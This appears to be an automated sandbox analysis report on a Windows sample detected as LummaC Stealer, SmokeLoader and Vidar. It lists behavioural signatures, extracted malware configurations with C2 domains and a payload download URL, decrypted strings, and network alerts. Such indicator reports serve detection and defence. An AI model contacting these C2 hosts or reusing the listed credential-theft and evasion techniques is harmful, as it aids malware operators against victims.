Windows Analysis Report
xvJv1BpknZ.exe

Overview

General Information

Sample name: xvJv1BpknZ.exe
renamed because original name is a hash value
Original sample name: c5261e67bd6d58771e27d7214e8f1c8f.exe
Analysis ID: 1448044
MD5: c5261e67bd6d58771e27d7214e8f1c8f
SHA1: 6fd857b3ebdb3888785d41f20277bc4e045bf704
SHA256: 09d1eba82060a4ff75575b471d563a5e02485e0aaa3afe743802a50d6e987410
Tags: 32exe

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body. SMOKY SPIDER https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: whispedwoodmoodsksl.shop Avira URL Cloud: Label: malware
Source: http://guteyr.cc/tmp/index.php Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/D Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/H Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/n Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\5876.exe Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp
Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 7.3.5876.exe.2170000.0.raw.unpack Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
Source: whispedwoodmoodsksl.shop Virustotal: Detection: 17%
Source: dbfhns.in Virustotal: Detection: 5%
Source: http://guteyr.cc/tmp/index.php Virustotal: Detection: 15%
Source: whispedwoodmoodsksl.shop Virustotal: Detection: 17%
Source: http://45.129.96.86/file/update.exe Virustotal: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\5876.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\etrtabd ReversingLabs: Detection: 28%
Source: xvJv1BpknZ.exe Virustotal: Detection: 34%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\etrtabd Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5876.exe Joe Sandbox ML: detected
Source: xvJv1BpknZ.exe Joe Sandbox ML: detected
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: boredimperissvieos.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: holicisticscrarws.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: sweetsquarediaslw.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: plaintediousidowsko.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: miniaturefinerninewjs.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: zippyfinickysofwps.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: obsceneclassyjuwks.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: acceptabledcooeprs.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: whispedwoodmoodsksl.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: TeslaBrowser/5.5
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: - Screen Resoluton:
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: - Physical Installed Memory:
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: Workgroup: -
Source: 7.3.5876.exe.2170000.0.raw.unpack String decryptor: swg5EG--
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0041537E CryptUnprotectData, 7_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D11A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 12_2_6D11A9A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 12_2_6D1625B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0E4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 12_2_6D0E4420
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D114440 PK11_PrivDecrypt, 12_2_6D114440
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1144C0 PK11_PubEncrypt, 12_2_6D1144C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D13A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 12_2_6D13A730
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D11A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 12_2_6D11A650
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0F8670 PK11_ExportEncryptedPrivKeyInfo, 12_2_6D0F8670
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0FE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 12_2_6D0FE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D140180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 12_2_6D140180
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1143B0 PK11_PubEncryptPKCS1,PR_SetError, 12_2_6D1143B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D13BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 12_2_6D13BD30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0F7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 12_2_6D0F7D60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D137C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 12_2_6D137C00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D113FF0 PK11_PrivDecryptPKCS1, 12_2_6D113FF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D139EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 12_2_6D139EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D113850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 12_2_6D113850
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D119840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 12_2_6D119840
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D13DA40 SEC_PKCS7ContentIsEncrypted, 12_2_6D13DA40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D113560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 12_2_6D113560

Compliance

Source: C:\Users\user\AppData\Local\Temp\5876.exe Unpacked PE file: 7.2.5876.exe.400000.0.unpack
Source: xvJv1BpknZ.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source: Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
Source: Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
Source: Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esi+00000910h] 7_2_00427353
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 7_2_00427353
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_004168EF
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 7_2_00409960
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 7_2_00409960
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 7_2_00404970
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] 7_2_00415FE1
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then dec edx 7_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 7_2_00417062
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 7_2_00417062
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 7_2_00426174
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esp+54h] 7_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 7_2_00426271
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 7_2_00426284
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 7_2_004102B2
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, 00008000h 7_2_00403570
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then cmp cl, 0000002Eh 7_2_00421580
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 7_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h 7_2_00414660
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edi, ebx 7_2_00436670
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 7_2_00431680
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esp+000000C0h] 7_2_004106B1
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h 7_2_004138D2
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 7_2_004248E0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 7_2_00423931
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 7_2_00423AD0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then jmp edx 7_2_00422AFB
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esp+4Ch] 7_2_00415AFA
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 7_2_0040CB10
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 7_2_0040FBB4
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then jmp edx 7_2_0041CCD0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 7_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 7_2_00423C97
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esi+08h] 7_2_00433D0A
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movzx esi, word ptr [ecx] 7_2_00438F15
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] 7_2_02136248
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then dec edx 7_2_0215B2B7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 7_2_021372C9
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 7_2_021372C9
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then cmp cl, 0000002Eh 7_2_021412E0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 7_2_021463DB
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then jmp edx 7_2_0213D097
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movzx esi, word ptr [ecx] 7_2_0215917C
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_02136739
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, 00008000h 7_2_021237D7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 7_2_021464D8
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 7_2_021464EB
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 7_2_02130519
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esi+00000910h] 7_2_021475BA
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 7_2_021475BA
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_02136B56
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 7_2_02144B47
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 7_2_02143B98
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 7_2_02124BD7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 7_2_02129BC7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 7_2_02129BC7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 7_2_02144B47
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 7_2_02122807
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edi, ebx 7_2_021568D7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h 7_2_021348C7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 7_2_021518E7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esp+000000C0h] 7_2_02130918
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esi+08h] 7_2_02153E13
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 7_2_0212FE1B
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 7_2_02143ECF
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 7_2_02143EFE
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then jmp dword ptr [004421CCh] 7_2_0213CF1A
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 7_2_02145F55
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov ecx, dword ptr [esp+000000A0h] 7_2_02141C89
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then jmp edx 7_2_02142D5B
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 7_2_0212CD77
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 4x nop then mov eax, dword ptr [esp+4Ch] 7_2_02135D61

Networking

Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49708 -> 190.13.174.94:80
